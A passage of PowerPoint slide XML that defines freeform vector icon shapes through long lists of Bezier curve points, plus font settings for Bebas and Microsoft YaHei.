                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="72"/>
                  <a:pt x="69" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="73"/>
                  <a:pt x="70" y="73"/>
                  <a:pt x="70" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="72"/>
                  <a:pt x="70" y="72"/>
                  <a:pt x="70" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="71"/>
                  <a:pt x="72" y="71"/>
                  <a:pt x="72" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="70"/>
                  <a:pt x="72" y="70"/>
                  <a:pt x="72" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="70"/>
                  <a:pt x="72" y="70"/>
                  <a:pt x="72" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="69"/>
                  <a:pt x="72" y="69"/>
                  <a:pt x="72" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="69"/>
                  <a:pt x="71" y="69"/>
                  <a:pt x="71" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="70"/>
                  <a:pt x="71" y="70"/>
                  <a:pt x="71" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="70"/>
                  <a:pt x="71" y="70"/>
                  <a:pt x="71" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="70"/>
                  <a:pt x="71" y="70"/>
                  <a:pt x="71" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="70"/>
                  <a:pt x="70" y="70"/>
                  <a:pt x="70" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="70"/>
                  <a:pt x="70" y="70"/>
                  <a:pt x="70" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="70"/>
                  <a:pt x="70" y="70"/>
                  <a:pt x="70" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="69"/>
                  <a:pt x="71" y="69"/>
                  <a:pt x="71" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="69"/>
                  <a:pt x="71" y="69"/>
                  <a:pt x="72" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="69"/>
                  <a:pt x="72" y="69"/>
                  <a:pt x="73" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="69"/>
                  <a:pt x="73" y="70"/>
                  <a:pt x="73" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="70"/>
                  <a:pt x="73" y="70"/>
                  <a:pt x="73" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="71"/>
                  <a:pt x="73" y="71"/>
                  <a:pt x="72" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="71"/>
                  <a:pt x="72" y="72"/>
                  <a:pt x="71" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="72"/>
                  <a:pt x="72" y="72"/>
                  <a:pt x="72" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="72"/>
                  <a:pt x="73" y="72"/>
                  <a:pt x="73" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="72"/>
                  <a:pt x="73" y="72"/>
                  <a:pt x="73" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="72"/>
                  <a:pt x="73" y="72"/>
                  <a:pt x="73" y="73"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="79" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="73"/>
                  <a:pt x="79" y="73"/>
                  <a:pt x="79" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="73"/>
                  <a:pt x="79" y="73"/>
                  <a:pt x="79" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="73"/>
                  <a:pt x="79" y="73"/>
                  <a:pt x="79" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                  <a:pt x="80" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                  <a:pt x="80" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="69"/>
                  <a:pt x="80" y="69"/>
                  <a:pt x="80" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="69"/>
                  <a:pt x="79" y="69"/>
                  <a:pt x="79" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="72"/>
                  <a:pt x="78" y="72"/>
                  <a:pt x="78" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="72"/>
                  <a:pt x="78" y="72"/>
                  <a:pt x="78" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="78" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="70"/>
                  <a:pt x="79" y="70"/>
                  <a:pt x="79" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                  <a:pt x="79" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="78" y="72"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="83" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="73"/>
                  <a:pt x="83" y="73"/>
                  <a:pt x="83" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="73"/>
                  <a:pt x="83" y="73"/>
                  <a:pt x="83" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="73"/>
                  <a:pt x="83" y="73"/>
                  <a:pt x="83" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                  <a:pt x="84" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                  <a:pt x="84" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="69"/>
                  <a:pt x="84" y="69"/>
                  <a:pt x="84" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="69"/>
                  <a:pt x="83" y="69"/>
                  <a:pt x="83" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81" y="72"/>
                  <a:pt x="81" y="72"/>
                  <a:pt x="81" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81" y="72"/>
                  <a:pt x="81" y="72"/>
                  <a:pt x="81" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="82" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="70"/>
                  <a:pt x="83" y="70"/>
                  <a:pt x="83" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                  <a:pt x="83" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="82" y="72"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="87" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                  <a:pt x="86" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="73"/>
                  <a:pt x="86" y="73"/>
                  <a:pt x="86" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="73"/>
                  <a:pt x="86" y="73"/>
                  <a:pt x="86" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="73"/>
                  <a:pt x="87" y="73"/>
                  <a:pt x="87" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                  <a:pt x="88" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                  <a:pt x="88" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="69"/>
                  <a:pt x="88" y="69"/>
                  <a:pt x="88" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="69"/>
                  <a:pt x="87" y="69"/>
                  <a:pt x="87" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85" y="72"/>
                  <a:pt x="85" y="72"/>
                  <a:pt x="85" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85" y="72"/>
                  <a:pt x="85" y="72"/>
                  <a:pt x="85" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="86" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="70"/>
                  <a:pt x="87" y="70"/>
                  <a:pt x="87" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                  <a:pt x="87" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86" y="72"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="91" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="72"/>
                  <a:pt x="91" y="72"/>
                  <a:pt x="91" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="72"/>
                  <a:pt x="90" y="72"/>
                  <a:pt x="90" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="73"/>
                  <a:pt x="90" y="73"/>
                  <a:pt x="90" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="73"/>
                  <a:pt x="90" y="73"/>
                  <a:pt x="90" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="73"/>
                  <a:pt x="90" y="73"/>
                  <a:pt x="91" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="73"/>
                  <a:pt x="91" y="73"/>
                  <a:pt x="91" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="73"/>
                  <a:pt x="92" y="73"/>
                  <a:pt x="92" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="73"/>
                  <a:pt x="92" y="73"/>
                  <a:pt x="92" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="73"/>
                  <a:pt x="92" y="73"/>
                  <a:pt x="92" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                  <a:pt x="92" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="69"/>
                  <a:pt x="92" y="69"/>
                  <a:pt x="92" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="69"/>
                  <a:pt x="91" y="69"/>
                  <a:pt x="91" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="72"/>
                  <a:pt x="89" y="72"/>
                  <a:pt x="89" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="72"/>
                  <a:pt x="89" y="72"/>
                  <a:pt x="89" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="72"/>
                  <a:pt x="91" y="72"/>
                  <a:pt x="91" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="90" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="70"/>
                  <a:pt x="91" y="70"/>
                  <a:pt x="91" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="72"/>
                  <a:pt x="91" y="72"/>
                  <a:pt x="91" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="90" y="7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Bebas" pitchFamily="2" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="Bebas" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 63"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8706030" y="3227914"/>
            <a:ext cx="484101" cy="456939"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 64 w 128"/>
              <a:gd name="T1" fmla="*/ 65 h 121"/>
              <a:gd name="T2" fmla="*/ 59 w 128"/>
              <a:gd name="T3" fmla="*/ 63 h 121"/>
              <a:gd name="T4" fmla="*/ 58 w 128"/>
              <a:gd name="T5" fmla="*/ 52 h 121"/>
              <a:gd name="T6" fmla="*/ 98 w 128"/>
              <a:gd name="T7" fmla="*/ 4 h 121"/>
              <a:gd name="T8" fmla="*/ 109 w 128"/>
              <a:gd name="T9" fmla="*/ 3 h 121"/>
              <a:gd name="T10" fmla="*/ 110 w 128"/>
              <a:gd name="T11" fmla="*/ 14 h 121"/>
              <a:gd name="T12" fmla="*/ 70 w 128"/>
              <a:gd name="T13" fmla="*/ 62 h 121"/>
              <a:gd name="T14" fmla="*/ 64 w 128"/>
              <a:gd name="T15" fmla="*/ 65 h 121"/>
              <a:gd name="T16" fmla="*/ 128 w 128"/>
              <a:gd name="T17" fmla="*/ 57 h 121"/>
              <a:gd name="T18" fmla="*/ 128 w 128"/>
              <a:gd name="T19" fmla="*/ 65 h 121"/>
              <a:gd name="T20" fmla="*/ 120 w 128"/>
              <a:gd name="T21" fmla="*/ 73 h 121"/>
              <a:gd name="T22" fmla="*/ 112 w 128"/>
              <a:gd name="T23" fmla="*/ 121 h 121"/>
              <a:gd name="T24" fmla="*/ 16 w 128"/>
              <a:gd name="T25" fmla="*/ 121 h 121"/>
              <a:gd name="T26" fmla="*/ 8 w 128"/>
              <a:gd name="T27" fmla="*/ 73 h 121"/>
              <a:gd name="T28" fmla="*/ 0 w 128"/>
              <a:gd name="T29" fmla="*/ 65 h 121"/>
              <a:gd name="T30" fmla="*/ 0 w 128"/>
              <a:gd name="T31" fmla="*/ 57 h 121"/>
              <a:gd name="T32" fmla="*/ 8 w 128"/>
              <a:gd name="T33" fmla="*/ 49 h 121"/>
              <a:gd name="T34" fmla="*/ 55 w 128"/>
              <a:gd name="T35" fmla="*/ 49 h 121"/>
              <a:gd name="T36" fmla="*/ 55 w 128"/>
              <a:gd name="T37" fmla="*/ 49 h 121"/>
              <a:gd name="T38" fmla="*/ 56 w 128"/>
              <a:gd name="T39" fmla="*/ 66 h 121"/>
              <a:gd name="T40" fmla="*/ 64 w 128"/>
              <a:gd name="T41" fmla="*/ 69 h 121"/>
              <a:gd name="T42" fmla="*/ 73 w 128"/>
              <a:gd name="T43" fmla="*/ 64 h 121"/>
              <a:gd name="T44" fmla="*/ 86 w 128"/>
              <a:gd name="T45" fmla="*/ 49 h 121"/>
              <a:gd name="T46" fmla="*/ 120 w 128"/>
              <a:gd name="T47" fmla="*/ 49 h 121"/>
              <a:gd name="T48" fmla="*/ 128 w 128"/>
              <a:gd name="T49" fmla="*/ 57 h 121"/>
              <a:gd name="T50" fmla="*/ 36 w 128"/>
              <a:gd name="T51" fmla="*/ 85 h 121"/>
              <a:gd name="T52" fmla="*/ 32 w 128"/>
              <a:gd name="T53" fmla="*/ 81 h 121"/>
              <a:gd name="T54" fmla="*/ 28 w 128"/>
              <a:gd name="T55" fmla="*/ 85 h 121"/>
              <a:gd name="T56" fmla="*/ 28 w 128"/>
              <a:gd name="T57" fmla="*/ 109 h 121"/>
              <a:gd name="T58" fmla="*/ 32 w 128"/>
              <a:gd name="T59" fmla="*/ 113 h 121"/>
              <a:gd name="T60" fmla="*/ 36 w 128"/>
              <a:gd name="T61" fmla="*/ 109 h 121"/>
              <a:gd name="T62" fmla="*/ 36 w 128"/>
              <a:gd name="T63" fmla="*/ 85 h 121"/>
              <a:gd name="T64" fmla="*/ 52 w 128"/>
              <a:gd name="T65" fmla="*/ 85 h 121"/>
              <a:gd name="T66" fmla="*/ 48 w 128"/>
              <a:gd name="T67" fmla="*/ 81 h 121"/>
              <a:gd name="T68" fmla="*/ 44 w 128"/>
              <a:gd name="T69" fmla="*/ 85 h 121"/>
              <a:gd name="T70" fmla="*/ 44 w 128"/>
              <a:gd name="T71" fmla="*/ 109 h 121"/>
              <a:gd name="T72" fmla="*/ 48 w 128"/>
              <a:gd name="T73" fmla="*/ 113 h 121"/>
              <a:gd name="T74" fmla="*/ 52 w 128"/>
              <a:gd name="T75" fmla="*/ 109 h 121"/>
              <a:gd name="T76" fmla="*/ 52 w 128"/>
              <a:gd name="T77" fmla="*/ 85 h 121"/>
              <a:gd name="T78" fmla="*/ 68 w 128"/>
              <a:gd name="T79" fmla="*/ 85 h 121"/>
              <a:gd name="T80" fmla="*/ 64 w 128"/>
              <a:gd name="T81" fmla="*/ 81 h 121"/>
              <a:gd name="T82" fmla="*/ 60 w 128"/>
              <a:gd name="T83" fmla="*/ 85 h 121"/>
              <a:gd name="T84" fmla="*/ 60 w 128"/>
              <a:gd name="T85" fmla="*/ 109 h 121"/>
              <a:gd name="T86" fmla="*/ 64 w 128"/>
              <a:gd name="T87" fmla="*/ 113 h 121"/>
              <a:gd name="T88" fmla="*/ 68 w 128"/>
              <a:gd name="T89" fmla="*/ 109 h 121"/>
              <a:gd name="T90" fmla="*/ 68 w 128"/>
              <a:gd name="T91" fmla="*/ 85 h 121"/>
              <a:gd name="T92" fmla="*/ 84 w 128"/>
              <a:gd name="T93" fmla="*/ 85 h 121"/>
              <a:gd name="T94" fmla="*/ 80 w 128"/>
              <a:gd name="T95" fmla="*/ 81 h 121"/>
              <a:gd name="T96" fmla="*/ 76 w 128"/>
              <a:gd name="T97" fmla="*/ 85 h 121"/>
              <a:gd name="T98" fmla="*/ 76 w 128"/>
              <a:gd name="T99" fmla="*/ 109 h 121"/>
              <a:gd name="T100" fmla="*/ 80 w 128"/>
              <a:gd name="T101" fmla="*/ 113 h 121"/>
              <a:gd name="T102" fmla="*/ 84 w 128"/>
              <a:gd name="T103" fmla="*/ 109 h 121"/>
              <a:gd name="T104" fmla="*/ 84 w 128"/>
              <a:gd name="T105" fmla="*/ 85 h 121"/>
              <a:gd name="T106" fmla="*/ 100 w 128"/>
              <a:gd name="T107" fmla="*/ 85 h 121"/>
              <a:gd name="T108" fmla="*/ 96 w 128"/>
              <a:gd name="T109" fmla="*/ 81 h 121"/>
              <a:gd name="T110" fmla="*/ 92 w 128"/>
              <a:gd name="T111" fmla="*/ 85 h 121"/>
              <a:gd name="T112" fmla="*/ 92 w 128"/>
              <a:gd name="T113" fmla="*/ 109 h 121"/>
              <a:gd name="T114" fmla="*/ 96 w 128"/>
              <a:gd name="T115" fmla="*/ 113 h 121"/>
              <a:gd name="T116" fmla="*/ 100 w 128"/>
              <a:gd name="T117" fmla="*/ 109 h 121"/>
              <a:gd name="T118" fmla="*/ 100 w 128"/>
              <a:gd name="T119" fmla="*/ 85 h 1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28" h="121">
                <a:moveTo>
                  <a:pt x="64" y="65"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="65"/>
                  <a:pt x="60" y="64"/>
                  <a:pt x="59" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="60"/>
                  <a:pt x="55" y="55"/>
                  <a:pt x="58" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="4"/>
                  <a:pt x="98" y="4"/>
                  <a:pt x="98" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="0"/>
                  <a:pt x="106" y="0"/>
                  <a:pt x="109" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="5"/>
                  <a:pt x="113" y="10"/>
                  <a:pt x="110" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="62"/>
                  <a:pt x="70" y="62"/>
                  <a:pt x="70" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="64"/>
                  <a:pt x="66" y="65"/>
                  <a:pt x="64" y="65"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="128" y="57"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="65"/>
                  <a:pt x="128" y="65"/>
                  <a:pt x="128" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="69"/>
                  <a:pt x="125" y="73"/>
                  <a:pt x="120" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="121"/>
                  <a:pt x="112" y="121"/>
                  <a:pt x="112" y="121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="121"/>
                  <a:pt x="16" y="121"/>
                  <a:pt x="16" y="121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="73"/>
                  <a:pt x="8" y="73"/>
                  <a:pt x="8" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="73"/>
                  <a:pt x="0" y="69"/>
                  <a:pt x="0" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="0" y="57"/>
                  <a:pt x="0" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="52"/>
                  <a:pt x="4" y="49"/>
                  <a:pt x="8" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="49"/>
                  <a:pt x="55" y="49"/>
                  <a:pt x="55" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="49"/>
                  <a:pt x="55" y="49"/>
                  <a:pt x="55" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="54"/>
                  <a:pt x="51" y="62"/>
                  <a:pt x="56" y="66"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="68"/>
